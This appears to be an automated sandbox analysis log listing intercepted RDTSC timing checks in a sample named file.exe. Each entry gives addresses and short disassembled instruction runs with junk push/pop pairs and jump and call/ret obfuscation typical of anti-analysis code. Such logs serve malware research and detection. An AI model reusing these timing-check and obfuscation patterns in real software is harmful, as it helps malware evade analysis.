Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E38C second address: 50E390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E390 second address: 50E39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E520 second address: 50E524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E524 second address: 50E52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E52A second address: 50E530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E530 second address: 50E53A instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E67D second address: 50E681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515803 second address: 51580F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51580F second address: 515816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515816 second address: 51581B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514136 second address: 514145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3D90D93B46h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514145 second address: 514149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514558 second address: 514587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B54h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D90D93B53h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514587 second address: 514590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC4BD second address: 4BC506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+124814EEh] 0x0000002a sub dh, FFFFFFF2h 0x0000002d add eax, ebx 0x0000002f mov cx, 195Ch 0x00000033 nop 0x00000034 jng 00007F3D90D93B6Bh 0x0000003a push eax 0x0000003b push edx 0x0000003c jo 00007F3D90D93B46h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC506 second address: 4BC5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90F37F1Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F3D90F37F18h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edi, eax 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F3D90F37F18h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov di, ax 0x0000004b mov dword ptr [ebp+122D2ADBh], ecx 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 push eax 0x00000055 pop eax 0x00000056 jmp 00007F3D90F37F25h 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F3D90F37F1Bh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514AC7 second address: 514ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514ACB second address: 514ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3D90F37F1Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514ADB second address: 514AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514AE8 second address: 514AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514AEC second address: 514B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90D93B46h 0x0000000e jmp 00007F3D90D93B53h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514B0D second address: 514B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515554 second address: 51555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51555A second address: 51558E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F3D90F37F18h 0x00000013 je 00007F3D90F37F1Eh 0x00000019 push ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51558E second address: 5155AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D90D93B56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5155AD second address: 5155B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517FE4 second address: 517FFA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90D93B46h 0x00000008 jp 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517FFA second address: 518004 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90F37F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518004 second address: 518029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B55h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3D90D93B46h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518029 second address: 518040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3D90F37F1Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518168 second address: 518185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518185 second address: 51819E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 jmp 00007F3D90F37F1Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51831A second address: 518338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3D90D93B55h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518662 second address: 51866A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E122 second address: 51E147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3D90D93B46h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F3D90D93B54h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E147 second address: 51E161 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90F37F18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F3D90F37F1Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E161 second address: 51E168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E9D1 second address: 51E9F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F3D90F37F18h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3D90F37F1Ch 0x00000018 pop edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E9F6 second address: 51E9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51EF81 second address: 51EF95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51EF95 second address: 51EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F231 second address: 51F236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F53F second address: 51F54B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90D93B46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FDEB second address: 51FE16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90F37F1Dh 0x00000008 jmp 00007F3D90F37F23h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE16 second address: 51FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F3D90D93B4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE2E second address: 51FE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE37 second address: 51FE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE3D second address: 51FE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47C8DB second address: 47C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524390 second address: 5243B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F3D90F37F16h 0x00000011 jmp 00007F3D90F37F27h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5243B8 second address: 5243D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3D90D93B46h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524523 second address: 524527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524800 second address: 52480F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F3D90D93B46h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524AE9 second address: 524AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524C66 second address: 524C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524C6A second address: 524C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FE72 second address: 52FE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3D90D93B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530004 second address: 530008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530008 second address: 530023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90D93B51h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530EC7 second address: 530F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F21h 0x00000007 jmp 00007F3D90F37F1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90F37F25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538D41 second address: 538D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3D90D93B54h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F3D90D93B4Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538D6C second address: 538D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538D72 second address: 538D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5387B5 second address: 5387CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5438C5 second address: 5438C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 472571 second address: 47258F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ch 0x00000009 jne 00007F3D90F37F1Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B95C second address: 54B962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABAD second address: 55ABB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABB8 second address: 55ABBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABBC second address: 55ABCC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABCC second address: 55ABE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55ABE8 second address: 55ABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAAA second address: 55CAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAAF second address: 55CAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAB5 second address: 55CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CABD second address: 55CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3D90F37F1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562087 second address: 56209A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56740B second address: 567415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5675AE second address: 5675B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5675B4 second address: 5675DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90F37F16h 0x0000000e jmp 00007F3D90F37F28h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5675DA second address: 5675DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56775D second address: 567761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5678EB second address: 5678F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5678F2 second address: 5678FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567BE9 second address: 567BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F3D90D93B48h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567BFE second address: 567C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567C02 second address: 567C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568633 second address: 568654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568654 second address: 568681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B59h 0x00000008 jmp 00007F3D90D93B4Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568681 second address: 56868A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56868A second address: 568690 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56DB0C second address: 56DB10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56DB10 second address: 56DB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57168E second address: 5716A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F3D90F37F1Fh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5732A3 second address: 5732A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5730FB second address: 573123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F3D90F37F27h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F3D90F37F1Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C5D8 second address: 57C5DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
